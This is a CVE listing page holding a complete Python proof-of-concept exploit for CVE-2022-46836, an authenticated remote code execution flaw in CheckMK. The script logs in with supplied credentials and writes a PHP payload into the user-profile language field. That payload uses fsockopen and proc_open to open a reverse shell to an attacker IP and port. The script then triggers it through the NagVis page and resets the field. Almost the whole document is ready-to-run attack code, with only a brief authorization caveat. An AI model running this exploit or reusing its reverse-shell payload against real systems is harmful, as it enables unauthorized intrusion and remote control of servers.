# 4837 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / exploit.py PY
# Exploit Title: CheckMK - Authenticated Remote Code Execution
# Date: 28-03-2023
# Exploit Author: Jacob Ebben
# Version: Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29
# Tested on: CheckMK 2.1.0p10 - Official CheckMK Docker Image
# CVE: CVE-2022-46836

#!/usr/bin/env python3

import argparse
import requests
import urllib3
from bs4 import BeautifulSoup
import re
from termcolor import colored

# Every request in this script is sent with verify=False (TLS certificate
# checks disabled), so silence the InsecureRequestWarning that urllib3 would
# otherwise emit for unverified HTTPS requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def print_message(message, type):
    """Print ``message`` prefixed with a coloured ``[LEVEL]`` tag.

    Args:
        message: Text to print; it is concatenated to the tag, so it must be
            a ``str``.
        type: One of ``'SUCCESS'``, ``'INFO'``, ``'WARNING'``, ``'ALERT'`` or
            ``'ERROR'``. Any other value prints nothing.
    """
    # Level label -> termcolor colour name, checked in this order.
    level_colors = (
        ('SUCCESS', 'green'),
        ('INFO', 'blue'),
        ('WARNING', 'yellow'),
        ('ALERT', 'yellow'),
        ('ERROR', 'red'),
    )
    for label, color in level_colors:
        if type == label:
            print(f"[{colored(label, color)}] " + message)
            return


class POC:
    """Proof of concept for CVE-2022-46836 (CheckMK authenticated RCE).

    The flow implemented here is: log in with valid credentials, read the
    current user-profile form values, re-submit the form with a payload in
    the ``language`` field, request the NagVis frontend to trigger it, and
    finally re-submit the form with ``language`` set back to ``"en"``.

    Only run this against systems you are explicitly authorized to test.
    """

    # ``id`` attributes of the profile-page elements whose selected option
    # must be echoed back when the profile form is re-submitted.
    _PROFILE_SELECT_IDS = (
        "ua_ui_sidebar_position",
        "ua_nav_hide_icons_title",
        "ua_start_url_use",
        "ua_icons_per_item",
        "ua_show_mode_use",
        "ua_ui_theme_use",
    )
    # ``name`` attributes of the <input> fields that must be echoed back too.
    _PROFILE_INPUT_NAMES = ("filled_in", "_transid")

    def __init__(self, target, ip, port, username, password, proxy):
        """Store the run parameters and create the HTTP session.

        Args:
            target: URL of the site under test; normalized to carry a scheme
                and a trailing slash.
            ip: Listener address embedded in the payload.
            port: Listener port embedded in the payload.
            username: Account name used to log in.
            password: Password used to log in.
            proxy: Optional HTTP proxy URL; falsy means "no proxy".
        """
        self.base_url = self._get_normalized_url(target)
        self.username = username
        self.password = password
        self.ip = ip
        self.port = port
        self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}

        self.session = requests.Session()

    def confirm(self):
        """Ask the operator to confirm the run.

        Returns:
            True only when the answer is exactly ``"Y"``; any other input
            (including an empty line or a lowercase ``"y"``) declines.
        """
        print_message("This script is designed to remove malicious artifacts, but remnants could remain!", "WARNING")
        confirmation_message = "Are you sure you wish to run this script? (Y/n) "
        confirmation_input = input('[' + colored('ALERT', 'yellow') +  '] ' + confirmation_message)
        return confirmation_input == "Y"

    def exploit(self):
        """Run the full sequence: login, write payload, trigger, clean up.

        The profile is reset in a ``finally`` clause so the payload is not
        left behind when writing or triggering it raises.
        """
        print_message("Starting login process ...", "INFO")
        self._login()
        print_message("Login appears successful!", "SUCCESS")
        print_message("Attempting to write the payload to auth.php ...", "INFO")
        settings = self._get_settings()
        print_message("Writing payload ...", "INFO")
        payload = f"\\')); $sock=fsockopen(\"{self.ip}\",{self.port});$proc=proc_open(\"sh\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); /*"
        try:
            self._set_settings(settings, payload)
            self._trigger_payload()
            print_message("A reverse shell should have gone out!", "SUCCESS")
        finally:
            # Always attempt the cleanup once a write has been attempted.
            # NOTE(review): the language is reset to "en", not to whatever
            # the account used before the run.
            print_message("Resetting profile settings to non-malicious", "INFO")
            settings = self._get_settings()
            self._set_settings(settings, "en")

    def _set_settings(self, settings, payload):
        """Submit the profile form with ``payload`` as the ``language`` value.

        Args:
            settings: Mapping produced by ``_get_settings``; its values are
                echoed back unchanged.
            payload: Value sent in the ``language`` form field.
        """
        profile_url = self.base_url + "check_mk/user_profile.py"
        csrf_token = self._get_csrf(profile_url)
        # ``files=`` with ``(None, value)`` tuples makes requests encode the
        # fields as multipart/form-data without attaching any file.
        self.session.post(
            profile_url,
            files=(
                ('csrf_token', (None, csrf_token)),
                ('language', (None, payload)),
                ('ua_ui_sidebar_position', (None, settings["ua_ui_sidebar_position"])),
                ('ua_start_url_use', (None, settings["ua_start_url_use"])),
                ('ua_icons_per_item', (None, settings["ua_icons_per_item"])),
                ('ua_show_mode_use', (None, settings["ua_show_mode_use"])),
                ('ua_nav_hide_icons_title', (None, settings["ua_nav_hide_icons_title"])),
                ('ua_ui_theme_use', (None, settings["ua_ui_theme_use"])),
                ('filled_in', (None, settings["filled_in"])),
                ('_transid', (None, settings["_transid"])),
                ('_save', (None, "SET")),
            ),
            proxies=self.proxies,
            allow_redirects=False,
            verify=False
        )

    def _get_settings(self):
        """Fetch the profile page and collect the current form values.

        Returns:
            dict mapping each name in ``_PROFILE_SELECT_IDS`` and
            ``_PROFILE_INPUT_NAMES`` to its current ``value`` attribute.

        Raises:
            SystemExit: With status 1 when an expected field is missing from
                the page.
        """
        profile_url = self.base_url + "check_mk/user_profile.py"
        profile_source = self.session.get(profile_url, proxies=self.proxies, verify=False).text
        page = BeautifulSoup(profile_source, 'html.parser')

        settings = {}
        for element_id in self._PROFILE_SELECT_IDS:
            element = page.find(id=element_id)
            # The current choice is the descendant carrying ``selected=""``.
            option = element.find(selected="") if element is not None else None
            settings[element_id] = self._require_value(option, element_id)
        for input_name in self._PROFILE_INPUT_NAMES:
            field = page.find("input", {"name": input_name})
            settings[input_name] = self._require_value(field, input_name)
        return settings

    def _require_value(self, tag, field_name):
        """Return ``tag["value"]``, or report ``field_name`` and exit if ``tag`` is None."""
        if tag is None:
            print_message(f"Could not read \"{field_name}\" from the profile page", "ERROR")
            raise SystemExit(1)
        return tag["value"]

    def _get_csrf(self, url):
        """Fetch ``url`` and extract the ``global_csrf_token`` JavaScript value.

        Raises:
            SystemExit: With status 1 when the page contains no token.
        """
        csrf_request = self.session.get(url, proxies=self.proxies, verify=False)
        csrf_regex = r'var global_csrf_token = "([^"]*)";'
        csrf_regex_result = re.search(csrf_regex, csrf_request.text)
        if csrf_regex_result is None:
            print_message(f"Could not retrieve a CSRF token from: {url}", "ERROR")
            # Non-zero status so calling scripts can detect the failure.
            raise SystemExit(1)
        return csrf_regex_result.group(1)

    def _trigger_payload(self):
        """Request the NagVis frontend page; the response is not inspected."""
        trigger_url = self.base_url + "nagvis/frontend/nagvis-js/index.php"
        self.session.get(trigger_url, proxies=self.proxies, verify=False)

    def _login(self):
        """Post the credentials to the login form.

        A 200 response is treated as a failed login; redirects are not
        followed, so any other status is accepted as success.

        Raises:
            SystemExit: With status 1 when the login is judged unsuccessful.
        """
        # Only the username is echoed so the password does not end up in
        # terminal scrollback or captured logs.
        print_message(f"Logging in as \"{self.username}\" ...", "INFO")
        login_url = self.base_url + "check_mk/login.py"
        login_result = self.session.post(
            login_url,
            files=(
                ('_username', (None, self.username)),
                ('_password', (None, self.password)),
                ('_login', (None, 'Login')),
            ),
            proxies=self.proxies,
            allow_redirects=False,
            verify=False
        )
        if login_result.status_code == 200:
            print_message("Login was not successful!", "ERROR")
            print_message("Are you sure the provided credentials are correct?", "INFO")
            raise SystemExit(1)

    def _get_normalized_url(self, url):
        """Return ``url`` with a trailing slash and an explicit scheme.

        ``http://`` is prepended when the URL starts with neither
        ``http://`` nor ``https://`` (compared case-insensitively).

        Raises:
            ValueError: If ``url`` is empty.
        """
        if not url:
            raise ValueError("URL must not be empty")
        if not url.endswith('/'):
            url += '/'
        if not url.lower().startswith(('http://', 'https://')):
            url = "http://" + url
        return url

    def _get_proxies(self, target_url, proxy_url):
        """Build a requests ``proxies`` mapping keyed by the target's scheme."""
        return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}

    def _get_url_protocol(self, url):
        """Return ``'https'`` for an ``https://`` URL, otherwise ``'http'``."""
        if url[0:8].lower() == 'https://':
            return 'https'
        return 'http'

def main():
    """Parse the command line and run the proof of concept.

    Unless ``--force`` is given, the operator is asked for confirmation
    first; declining prints a notice and returns without sending anything.
    """
    parser = argparse.ArgumentParser(description="CheckMK - Authenticated Remote Code Execution")

    parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1/cmk/\" or \"https://checkmk.example.xyz/cmk/\")")
    parser.add_argument('-u', '--username', required=True, type=str, help='valid username')
    parser.add_argument('-p', '--password', required=True, type=str, help='valid password')
    parser.add_argument('-I', '--atk-ip', required=True, type=str, help='attacker ip for reverse shell')
    # Parsed as int so a non-numeric port is rejected by argparse up front.
    parser.add_argument('-P', '--atk-port', required=True, type=int, help='attacker port for reverse shell')
    parser.add_argument('-x', '--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)')
    parser.add_argument("--force", action='store_true', help="skip confirmation request")

    args = parser.parse_args()

    exploit = POC(args.target, args.atk_ip, args.atk_port, args.username, args.password, args.proxy)
    if args.force or exploit.confirm():
        exploit.exploit()
    else:
        print_message("Exiting without exploitation ...", "INFO")


# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()